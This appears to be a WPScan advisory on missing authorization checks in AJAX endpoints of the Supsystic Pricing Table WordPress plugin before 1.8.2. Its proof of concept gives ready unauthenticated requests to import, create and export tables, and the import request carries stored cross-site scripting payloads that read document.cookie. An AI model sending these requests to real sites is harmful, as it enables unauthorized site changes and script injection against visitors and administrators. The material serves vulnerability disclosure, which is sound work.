Pricing Table by Supsystic < 1.8.2 - Insecure Permissions on AJAX Actions



Description
An issue was discovered in the pricing-table-by-supsystic plugin before 1.8.2 for WordPress. Because there is no permission check on the ImportJSONTable, createFromTpl, and getJSONExportTable endpoints, unauthenticated users can retrieve pricing table information, create new tables, or import/modify a table.
Proof of Concept
URL/wp-admin/admin-ajax.php?mod=tables&action=importJSONTable&data%5B0%5D%5Bid%5D=11&data%5B0%5D%5Bunique_id%5D=Pwn8M1EB&data%5B0%5D%5Blabel%5D=<script>alert(document.cookie)</script>&data%5B0%5D%5Boriginal_id%5D=11&data%5B0%5D%5Bparams%5D%5Bbg_color%5D%5Bval%5D=%23424242&data%5B0%5D%5Bparams%5D%5Btxt_item_html%5D%5Bval%5D=%3Cdiv+class%3D%22ptsEl%22+data-el%3D%22table_cell_txt%22+data-type%3D%22txt%22%3E%3Cp%3E%3Cspan+style%3D%22font-size%3A+12pt%3B%22+data-mce-style%3D%22font-size%3A+12pt%3B%22%3EYour+Text%3C%2Fspan%3E%3C%2Fp%3E%3C%2Fdiv%3E&data%5B0%5D%5Bparams%5D%5Bimg_item_html%5D%5Bval%5D=%3Cdiv+class%3D%22ptsEl+ptsElImg+ptsElWithArea%22+data-el%3D%22table_cell_img%22+data-type%3D%22img%22%3E%0D%0A%09%3Cdiv+class%3D%22ptsElArea%22%3E%3Cimg+src%3D%22http%3A%2F%2Fsupsystic-42d7.kxcdn.com%2F_assets%2Ftables%2Fimg%2Fexample.jpg%22+%2F%3E%3C%2Fdiv%3E%0D%0A%3C%2Fdiv%3E&data%5B0%5D%5Bparams%5D%5Bicon_item_html%5D%5Bval%5D=%3Cdiv+data-icon%3D%22fa-cog%22+data-color%3D%22rgb(0%2C+220%2C+223)%22+data-type%3D%22icon%22+data-el%3D%22table_cell_icon%22+class%3D%22ptsIcon+ptsEl+ptsElInput%22%3E%3Ci+class%3D%22fa+fa-2x+ptsInputShell+fa-cog%22+style%3D%22color%3A+rgb(0%2C+220%2C+223)%3B%22%3E%3C%2Fi%3E%3C%2Fdiv%3E&data%5B0%5D%5Bparams%5D%5Bnew_column_html%5D%5Bval%5D=<script>alert(document.cookie)</script>&data%5B0%5D%5Bparams%5D%5Bnew_cell_html%5D%5Bval%5D=<script>alert(document.cookie)</script>&data%5B0%5D%5Bparams%5D%5Bcell_color_css%5D%5Bval%5D=<script>alert(document.cookie)</script>&data%5B0%5D%5Bparams%5D%5Benb_desc_col%5D%5Bval%5D=1&data%5B0%5D%5Bparams%5D%5Bcol_width%5D%5Bval%5D=186&data%5B0%5D%5Bparams%5D%5Bcols_num%5D%5Bval%5D=4&data%5B0%5D%5Bparams%5D%5Brows_num%5D%5Bval%5D=5&data%5B0%5D%5Bparams%5D%5Bcalc_width%5D%5Bval%5D=table&data%5B0%5D%5Bparams%5D%5Btable_width%5D%5Bval%5D=100&data%5B0%5D%5Bparams%5D%5Btable_width_measure%5D%5Bval%5D=%25&data%5B0%5D%5Bparams%5D%5Benb_hover_animation%5D%5Bval%5D=1&data%5B0%5D%5Bparams%5D%5Bfont_family%5D%5Bval%5D=Raleway&data%5B0%5D%5Bparams%5D%5Btext_color%5D%5Bval%5D=%23000&data%5B0%5D%5Bparams%5D%5Btext_color_header%5D%5Bval%5D=%23808080&data%5B0%5D%5Bparams%5D%5Btext_color_desc%5D%5Bval%5D=%23808080&data%5B0%5D%5Bparams%5D%5Bresp_min_col_width%5D%5Bval%5D=150&data%5B0%5D%5Bparams%5D%5Bis_horisontal_row_type%5D%5Bval%5D=0&data%5B0%5D%5Bhtml%5D=<script>alert(document.cookie)</script>&data%5B0%5D%5Bcss%5D=<script>alert(document.cookie)</script>&data%5B0%5D%5Bimg%5D=gradient-standard.jpg&data%5B0%5D%5Bsort_order%5D=0&data%5B0%5D%5Bis_base%5D=1&data%5B0%5D%5Bis_pro%5D=0&data%5B0%5D%5Bdate_created%5D=2020-01-16+00%3A40%3A10&data%5B0%5D%5Bimg_url%5D=http%3A%2F%2Fsupsystic-42d7.kxcdn.com%2F_assets%2Ftables%2Fimg%2Fprev%2Fgradient-standard.jpg&data%5B0%5D%5Bsession_id%5D=715993&data%5B0%5D%5Bview_id%5D=ptsBlock_715993&data%5B0%5D%5Bcat_code%5D=price_table&update_with_same_id=1&pl=pts&reqType=ajax


URL/wp-admin/admin-ajax.php?label=Test&original_id=1&mod=tables&action=createFromTpl&pl=pts&reqType=ajax

URL/wp-admin/admin-ajax.php?mod=tables&action=getJSONExportTable&tables%5B%5D=9&tables%5B%5D=8&pl=pts&reqType=ajax

Affects Plugin

fixed in version 1.8.2

References

CVE 2020-9394
CVE 2020-9393
CVE 2020-9392
URL https://www.wordfence.com/blog/2020/02/multiple-vulnerabilities-patched-in-pricing-table-by-supsystic-plugin/

Classification

Type BYPASS

Miscellaneous

Original Researcher Chloe Chamberland
Submitter Chloe Chamberland
Submitter Website https://www.wordfence.com/
Submitter Twitter infosecchloe
Views 2063
Verified No
WPVDB ID 10090

Timeline

Publicly Published 2020-02-25 (4 months ago)
Added 2020-02-25 (4 months ago)
Last Updated 2020-03-24 (3 months ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin